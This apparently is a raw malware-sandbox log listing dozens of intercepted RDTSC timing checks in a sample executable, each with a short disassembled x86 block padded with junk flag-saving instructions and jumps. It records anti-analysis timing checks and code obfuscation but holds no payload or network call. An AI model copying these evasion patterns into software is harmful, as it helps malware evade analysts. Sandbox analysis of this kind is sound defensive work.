Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410ADB second address: 7410B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, A157h 0x00000007 pushfd 0x00000008 jmp 00007FB0A4FB5B8Ch 0x0000000d and ax, B5C8h 0x00000012 jmp 00007FB0A4FB5B8Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov cx, bx 0x00000020 movsx edx, cx 0x00000023 popad 0x00000024 nop 0x00000025 pushad 0x00000026 mov ah, 36h 0x00000028 popad 0x00000029 lea eax, dword ptr [ebp-10h] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FB0A4FB5B8Ah 0x00000033 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410B72 second address: 7410B76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410B76 second address: 7410C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FB0A4FB5B95h 0x0000000c sub ecx, 124231B6h 0x00000012 jmp 00007FB0A4FB5B91h 0x00000017 popfd 0x00000018 popad 0x00000019 mov edi, eax 0x0000001b pushad 0x0000001c mov cx, 0343h 0x00000020 pushfd 0x00000021 jmp 00007FB0A4FB5B98h 0x00000026 jmp 00007FB0A4FB5B95h 0x0000002b popfd 0x0000002c popad 0x0000002d test edi, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FB0A4FB5B93h 0x00000038 jmp 00007FB0A4FB5B93h 0x0000003d popfd 0x0000003e pushfd 0x0000003f jmp 00007FB0A4FB5B98h 0x00000044 or si, 33F8h 0x00000049 jmp 00007FB0A4FB5B8Bh 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410D45 second address: 7410D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410D57 second address: 7410D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d jmp 00007FB0A4FB5B94h 0x00000012 mov si, 7741h 0x00000016 popad 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410D8C second address: 7410D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410D90 second address: 7410DA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410DA9 second address: 7410DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410E14 second address: 7410E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410E18 second address: 7410E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410E1E second address: 7410ECD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A4FB5B8Ch 0x00000009 or esi, 7285EAD8h 0x0000000f jmp 00007FB0A4FB5B8Bh 0x00000014 popfd 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test edi, edi 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB0A4FB5B91h 0x00000024 adc si, 1A76h 0x00000029 jmp 00007FB0A4FB5B91h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007FB0A4FB5B90h 0x00000035 or cx, 2F98h 0x0000003a jmp 00007FB0A4FB5B8Bh 0x0000003f popfd 0x00000040 popad 0x00000041 js 00007FB1132A43AAh 0x00000047 jmp 00007FB0A4FB5B96h 0x0000004c mov eax, dword ptr [ebp-04h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FB0A4FB5B97h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410ECD second address: 7410ED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410ED3 second address: 7410ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410ED7 second address: 7410EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB0A5355D69h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410EFF second address: 7410F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410F03 second address: 7410F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410F09 second address: 7410F88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A4FB5B8Ah 0x00000009 add ah, FFFFFFE8h 0x0000000c jmp 00007FB0A4FB5B8Bh 0x00000011 popfd 0x00000012 call 00007FB0A4FB5B98h 0x00000017 pop eax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b lea eax, dword ptr [ebx+70h] 0x0000001e jmp 00007FB0A4FB5B91h 0x00000023 push 00000001h 0x00000025 jmp 00007FB0A4FB5B8Eh 0x0000002a nop 0x0000002b jmp 00007FB0A4FB5B90h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FB0A4FB5B8Eh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410F88 second address: 7410FE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A5355D61h 0x00000009 jmp 00007FB0A5355D5Bh 0x0000000e popfd 0x0000000f jmp 00007FB0A5355D68h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 pushad 0x00000019 pushad 0x0000001a mov cx, 77F3h 0x0000001e popad 0x0000001f jmp 00007FB0A5355D5Fh 0x00000024 popad 0x00000025 lea eax, dword ptr [ebp-18h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movsx ebx, ax 0x0000002e movzx eax, bx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410FE9 second address: 7411009 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411009 second address: 7411034 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 5E48B40Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, ecx 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov edx, 1F48DED2h 0x00000013 mov dx, 161Eh 0x00000017 popad 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB0A5355D60h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411034 second address: 741103A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741103A second address: 741103E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74110E3 second address: 7411190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A4FB5B8Fh 0x00000009 or eax, 67A115AEh 0x0000000f jmp 00007FB0A4FB5B99h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d pushad 0x0000001e call 00007FB0A4FB5B98h 0x00000023 call 00007FB0A4FB5B92h 0x00000028 pop esi 0x00000029 pop edx 0x0000002a mov si, C507h 0x0000002e popad 0x0000002f mov edx, 757806ECh 0x00000034 jmp 00007FB0A4FB5B8Ah 0x00000039 sub eax, eax 0x0000003b jmp 00007FB0A4FB5B91h 0x00000040 lock cmpxchg dword ptr [edx], ecx 0x00000044 pushad 0x00000045 movzx eax, bx 0x00000048 mov dx, 6C2Ch 0x0000004c popad 0x0000004d pop edi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FB0A4FB5B8Eh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411190 second address: 74111C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FB0A5355D5Fh 0x00000012 jne 00007FB113644286h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ah, dh 0x0000001d jmp 00007FB0A5355D5Ch 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74111C4 second address: 74111D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A4FB5B8Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74111D6 second address: 7411225 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e jmp 00007FB0A5355D66h 0x00000013 mov eax, dword ptr [esi] 0x00000015 jmp 00007FB0A5355D60h 0x0000001a mov dword ptr [edx], eax 0x0000001c pushad 0x0000001d mov si, C32Dh 0x00000021 mov ch, 65h 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+04h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411225 second address: 741122B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741122B second address: 7411243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411243 second address: 741126E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FB0A4FB5B91h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741126E second address: 74112A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007FB0A5355D63h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esi+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB0A5355D62h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74112A2 second address: 741131C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A4FB5B91h 0x00000009 or ecx, 55193D06h 0x0000000f jmp 00007FB0A4FB5B91h 0x00000014 popfd 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+08h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FB0A4FB5B8Fh 0x00000026 or eax, 30412C3Eh 0x0000002c jmp 00007FB0A4FB5B99h 0x00000031 popfd 0x00000032 call 00007FB0A4FB5B90h 0x00000037 pop ecx 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741131C second address: 7411337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411337 second address: 741139F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+0Ch] 0x0000000e jmp 00007FB0A4FB5B8Eh 0x00000013 mov dword ptr [edx+0Ch], eax 0x00000016 jmp 00007FB0A4FB5B90h 0x0000001b mov eax, dword ptr [esi+10h] 0x0000001e jmp 00007FB0A4FB5B90h 0x00000023 mov dword ptr [edx+10h], eax 0x00000026 pushad 0x00000027 mov edx, ecx 0x00000029 mov dh, ah 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+14h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741139F second address: 74113A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74113A3 second address: 74113A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74113A7 second address: 74113AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74113AD second address: 741142E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB0A4FB5B8Fh 0x00000008 pop ecx 0x00000009 mov di, 51FCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [edx+14h], eax 0x00000013 jmp 00007FB0A4FB5B8Bh 0x00000018 mov eax, dword ptr [esi+18h] 0x0000001b pushad 0x0000001c movzx esi, di 0x0000001f call 00007FB0A4FB5B91h 0x00000024 push esi 0x00000025 pop ebx 0x00000026 pop eax 0x00000027 popad 0x00000028 mov dword ptr [edx+18h], eax 0x0000002b pushad 0x0000002c pushad 0x0000002d mov dx, ADEAh 0x00000031 call 00007FB0A4FB5B8Bh 0x00000036 pop ecx 0x00000037 popad 0x00000038 pushad 0x00000039 mov ebx, 53B7659Ah 0x0000003e mov esi, edi 0x00000040 popad 0x00000041 popad 0x00000042 mov eax, dword ptr [esi+1Ch] 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FB0A4FB5B98h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741142E second address: 7411440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411440 second address: 7411444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411444 second address: 7411458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cx, 7A6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411458 second address: 741145D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741145D second address: 74114C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB0A5355D64h 0x00000013 and eax, 13754DC8h 0x00000019 jmp 00007FB0A5355D5Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FB0A5355D68h 0x00000025 or al, 00000028h 0x00000028 jmp 00007FB0A5355D5Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [edx+20h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74114C9 second address: 74114CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74114CD second address: 74114E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74114E8 second address: 741156E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007FB0A4FB5B8Eh 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FB0A4FB5B8Eh 0x0000001b sbb ecx, 25D17748h 0x00000021 jmp 00007FB0A4FB5B8Bh 0x00000026 popfd 0x00000027 mov si, 3EBFh 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+28h] 0x0000002f jmp 00007FB0A4FB5B92h 0x00000034 mov dword ptr [edx+28h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007FB0A4FB5B8Dh 0x0000003f mov ecx, 4B0B6C97h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741156E second address: 7411574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411574 second address: 7411578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411578 second address: 74115D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [esi+2Ch] 0x0000000e jmp 00007FB0A5355D66h 0x00000013 mov dword ptr [edx+2Ch], ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FB0A5355D5Dh 0x0000001f xor ch, FFFFFFD6h 0x00000022 jmp 00007FB0A5355D61h 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74115D1 second address: 74115D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74115D6 second address: 741162E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FB0A5355D5Bh 0x00000015 pushfd 0x00000016 jmp 00007FB0A5355D68h 0x0000001b add si, 5588h 0x00000020 jmp 00007FB0A5355D5Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741162E second address: 7411634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411634 second address: 7411638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411638 second address: 74116CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+30h], ax 0x0000000f jmp 00007FB0A4FB5B96h 0x00000014 mov ax, word ptr [esi+32h] 0x00000018 jmp 00007FB0A4FB5B90h 0x0000001d mov word ptr [edx+32h], ax 0x00000021 pushad 0x00000022 mov bl, ch 0x00000024 jmp 00007FB0A4FB5B93h 0x00000029 popad 0x0000002a mov eax, dword ptr [esi+34h] 0x0000002d pushad 0x0000002e jmp 00007FB0A4FB5B94h 0x00000033 movzx esi, di 0x00000036 popad 0x00000037 mov dword ptr [edx+34h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FB0A4FB5B98h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74116CB second address: 74116D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74116D2 second address: 74116F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test ecx, 00000700h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB0A4FB5B94h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74116F5 second address: 7411707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411707 second address: 741171B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FB1132A3B8Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741171B second address: 7411721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411721 second address: 7411809 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F2A4h 0x00000007 mov ax, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d or dword ptr [edx+38h], FFFFFFFFh 0x00000011 pushad 0x00000012 pushad 0x00000013 mov eax, edi 0x00000015 pushfd 0x00000016 jmp 00007FB0A4FB5B97h 0x0000001b adc esi, 7831776Eh 0x00000021 jmp 00007FB0A4FB5B99h 0x00000026 popfd 0x00000027 popad 0x00000028 pushfd 0x00000029 jmp 00007FB0A4FB5B90h 0x0000002e add ecx, 0D750AE8h 0x00000034 jmp 00007FB0A4FB5B8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b or dword ptr [edx+3Ch], FFFFFFFFh 0x0000003f pushad 0x00000040 movzx esi, bx 0x00000043 mov dh, E3h 0x00000045 popad 0x00000046 or dword ptr [edx+40h], FFFFFFFFh 0x0000004a pushad 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FB0A4FB5B90h 0x00000052 xor cl, 00000078h 0x00000055 jmp 00007FB0A4FB5B8Bh 0x0000005a popfd 0x0000005b popad 0x0000005c pushfd 0x0000005d jmp 00007FB0A4FB5B98h 0x00000062 sbb ecx, 6DE282D8h 0x00000068 jmp 00007FB0A4FB5B8Bh 0x0000006d popfd 0x0000006e popad 0x0000006f pop esi 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FB0A4FB5B95h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411809 second address: 741181E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 40h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c mov ecx, 7B0A7081h 0x00000011 push eax 0x00000012 push edx 0x00000013 mov ebx, esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741181E second address: 7411822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460DA0 second address: 7460DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460DA4 second address: 7460DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
